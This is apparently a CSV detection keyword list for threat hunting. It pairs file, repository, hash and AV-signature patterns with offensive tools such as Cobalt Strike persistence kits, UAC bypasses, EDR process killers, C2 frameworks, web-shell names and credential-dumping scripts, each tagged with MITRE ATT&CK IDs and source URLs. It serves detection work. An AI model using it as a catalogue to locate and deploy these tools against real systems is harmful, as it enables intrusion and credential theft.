+"*azuread_decrypt_msol_*.ps1*","offensive_tool_keyword","powershell","method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync","T1003.006","TA0006","N/A","N/A","Credential Access","https://gist.github.com/analyticsearch/7453d22d737e46657eb57c44d5cf4cbb","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*AzureADLateralMovement*","offensive_tool_keyword","AzureADLateralMovement","AzureADLateralMovement allows to build Lateral Movement graph for Azure Active Directory entities - Users. Computers. Groups and Roles. Using the Microsoft Graph API AzureADLateralMovement extracts interesting information and builds json files containing lateral movement graph data compatible with Bloodhound 2.2.0","T1074 - T1075 - T1076","TA0008 - TA0009 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/talmaor/AzureADLateralMovement","1","1","N/A","N/A","2","111","21","2022-12-08T06:44:48Z","2019-06-22T06:13:28Z" +"*AzureADRecon.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*AzureC2Relay.zip*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*AzureC2Relay-main*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*AzureHound.ps1*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*azurehound/v2*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z" +"*-b bleeding-jumbo*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*b12885f92d7691b2823d2b921b7dda440cbcc4c6aa5a3b7c3e9e6f7af4772397*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b1b79e79880d60412e41d43b5e9ef936fdb3e66ad85e47fc0e1261ed07322d06*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b23r0/Heroinn*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" +"*b23r0/rsocx*","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","319","146","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" +"*b289e30ce698eb0402babc2788ac7022b6a7db161296182e0e13fd021a3bee03*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b2xtranslator.xls.csproj*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*B374K*index.php*","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2249","783","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" +"*b3rito*yodo*","offensive_tool_keyword","yodo","This tool proves how easy it is to become root via limited sudo permissions. via dirty COW or using Pa(th)zuzu. ","T1068 - T1078 - T1529","TA0004 - TA0008","N/A","N/A","Exploitation tools","https://github.com/b3rito/yodo","1","1","N/A","N/A","3","202","34","2017-02-28T15:38:13Z","2016-11-13T21:02:03Z" +"*b419f6b7b8d24dc61e7473092a8326720ef54e1f65cc185da0c6e080c9debb94*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*b4ldr/nse-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*b4rtik/RedPeanut*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*b4rtik/RedPeanut*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1095 - T1071.004","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*B5627919-4DFB-49C6-AC1B-C757F4B4A103*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*B64_ENCODED_PAYLOAD_UUID*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*b64encode*.:::-989-:::.*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" +"*b64payloadgen.sh*","offensive_tool_keyword","POC","exploitation of CVE-2021-4034","T1210","N/A","N/A","N/A","Exploitation tools","https://github.com/luijait/PwnKit-Exploit","1","1","N/A","N/A","1","79","14","2022-02-07T15:42:00Z","2022-01-26T18:01:26Z" +"*b64stager*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*B651A53C-FAE6-482E-A590-CA3B48B7F384*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*B67143DE-321D-4034-AC1D-C6BB2D98563F*","offensive_tool_keyword","PrintSpoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*B67143DE-321D-4034-AC1D-C6BB2D98563F*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*b7671f125bb2ed21d0476a00cfaa9ed6*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*b7dec074f463b0be08dd3a707495e45c7a629502fa6dd7ef972a74a2aff72632*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ba8fe35020bcd560c0f100bda43c2311bfdbb97aafbe367ac5077cebca59287f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*babelstrike.py -*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" +"*BabelStrike-main*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" +"*Backdoor LNK*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*Backdoor.*","offensive_tool_keyword","backdoor keyword","keyword observed in multiple backdoor tools","T1037.001 - T1037.002 - T1003.001 - T1001.002 - T1055.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*backdoor.asp*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*Backdoor.ASP.FUZZSHELL.A*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor.ASP.WEBSHELL.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*backdoor.aspx*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*backdoor.jsp*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*backdoor.php*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*Backdoor.PHP.WebShell.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor/Win.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Backdoor:JS/*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","backdoor signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor:Linux*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","backdoor signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor:Python*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","backdoor signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor:VBS/*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","backdoor signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor:Win32*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","backdoor signatures","N/A","N/A","N/A","N/A","N/A","N/A" +"*Backdoor:Win64*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","backdoor signatures","10","10","N/A","N/A","N/A","N/A" +"*BackdoorableScript*","offensive_tool_keyword","boko","boko.py is an application scanner for macOS that searches for and identifies potential dylib hijacking and weak dylib vulnerabilities for application executables as well as scripts an application may use that have the potential to be backdoored","T1195 - T1078 - T1079 - T1574","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/bashexplode/boko","1","1","N/A","N/A","1","59","12","2021-09-28T22:36:01Z","2020-05-22T21:46:33Z" +"*--backdoor-all*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*BackdoorLNK*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*backdoorlnkdialog*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*backstab.exe*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*Backstab.sln*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*backstab.x64.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*backstab.x86.*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*Backstab/Driverloading*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*Backstab-master*","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1107 - T1106 - T1543.004 ","TA0002 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/Yaxser/Backstab","1","1","N/A","N/A","10","1237","216","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z" +"*BackupOperatorToDA.cpp*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*BackupOperatorToDA.exe*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*BackupOperatorToDA.sln*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" 